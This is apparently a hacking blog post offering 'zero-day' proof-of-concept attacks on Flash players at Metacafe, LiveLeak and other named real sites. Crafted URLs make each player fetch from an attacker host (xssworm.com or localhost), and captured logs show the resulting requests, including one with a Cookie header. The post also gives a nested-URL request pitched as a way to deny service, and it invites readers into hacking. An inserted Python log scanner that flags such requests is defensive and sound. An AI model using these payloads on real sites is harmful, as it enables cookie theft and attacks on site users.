Archive for Hacking Metacafe

Zero Day Shockwave SWF Player Exploit with XSS Attack

Here we have some proof-of-concept demonstrations of XSS attacks and cross flash forgery on many sites.

We hope our readers will leave some feedback on these serious vulnerabilities.

SWF Exploit 1.)

We point the browser at the target Shockwave player:

http://alanakurtis.com/flash/musicplayer.swf?song_url=http://localhost/xssworm/&autoplay=true

but on localhost we see:

Connect to [127.0.0.1] from localhost [127.0.0.1] 4131
GET /xssworm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive

..

(-;

Maybe the Blackhat attack to deny server users : host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=xssworm.com

Also, the browser shows:

http://www.moanmyip.com/player.swf?song_url=http://localhost/xssworm?seo&autoplay=true

but in the logger we see:

Connect to [127.0.0.1] from localhost [127.0.0.1] 3831
GET /xssworm?seo HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive

And in hacking Metacafe we discover a Shockwave XSS 0-day attack that a blackhat can use to steal fish:

MetaCafe XSS Worm Vulnerability - 0-Day Shockwave Attack POC

Demo:

http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true&

We see this log output at XSSWORM.com:
GET /crossdomain.xml HTTP/1.1
Host: metacafe.122.2o7.net
… snips…
Connection: keep-alive
Cookie: … snips…

We see many more serious vulnerabilities in the web 2.0 today.

Hacker browses: http://www.liveleak.com/player.swf?song_url=http://localhost/hurr&autoplay=true

In server log:

connect to [127.0.0.1] from localhost [127.0.0.1] 1268
GET /urchin.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;)
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.liveleak.com/

(;

Please leave nice XSS comments.
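
As an added example (not from the original post and not any of these sites' own code), here is a log check a site operator can run to find requests like the ones above, where a .swf player is handed a URL on a host outside the operator's allowlist. The allowlist hosts, the log lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed allowlist: the only hosts this site's players should load media from.
ALLOWED_MEDIA_HOSTS = {"media.example.com", "www.example.com"}

# Request target inside a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def external_url_params(target, allowed_hosts=ALLOWED_MEDIA_HOSTS):
    """Return [(param, host)] for .swf query parameters that point off-site."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".swf"):
        return []
    findings = []
    # parse_qsl percent-decodes, so song_url=http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        try:
            # Absolute (http://host/) and scheme-relative (//host/) values both
            # carry a host; plain relative paths and flags like "true" do not.
            host = (urlsplit(value).hostname or "").lower()
        except ValueError:
            host = "(unparsable)"  # malformed authority: report it for review
        if host and host not in allowed_hosts:
            findings.append((name, host))
    return findings


def scan_access_log(lines, allowed_hosts=ALLOWED_MEDIA_HOSTS):
    """Return [(line_number, param, host)] for every off-site player parameter."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hits += [(lineno, n, h) for n, h in external_url_params(match.group(1), allowed_hosts)]
    return hits


# Constructed log lines; paths and parameter names mirror the requests in the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /flash/musicplayer.swf?song_url=http://media.example.com/a.mp3&autoplay=true HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2008:10:00:05 +0000] "GET /flash/musicplayer.swf?song_url=http://localhost/xssworm/&autoplay=true HTTP/1.1" 200 5120',
    '192.0.2.12 - - [01/Jan/2008:10:00:09 +0000] "GET /player.swf?itemID=1&mediaURL=http%3A%2F%2Fthird-party.example.net%2F%3Ffish&isViral=false HTTP/1.1" 200 9000',
    '192.0.2.13 - - [01/Jan/2008:10:00:12 +0000] "GET /index.html?next=http://third-party.example.net/ HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("off-site media parameter: line %d, %s -> %s" % hit)
```

The same allowlist comparison belongs inside the player or the page that embeds it, so that a media URL on an unlisted host is never fetched in the first place.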


Video: Hacker expert says Metacafe can be hacked with XSS Worm

The hacker PsychoGun has discovered many security vulnerabilities in the popular video site Metacafe, including new serious XSS exploits.

Vulnerabilities are security holes used by hackers to hack websites or their users. When we search Metacafe for the keyword "hacking", we see many hacking videos.

“I do not understand why videos which speak about hacking Metacafe vulnerabilities can be rejected, whereas many videos of hacking Windows are rewarded,” says the hacker PsychoGun. “Does somebody have an answer?”

Visitors, please comment if you have knowledge of hacking Metacafe videos or if you have seen these tricks before.

If you are new to XSS hacking you must view our special How To Hack blogs and leave comments,

thank you
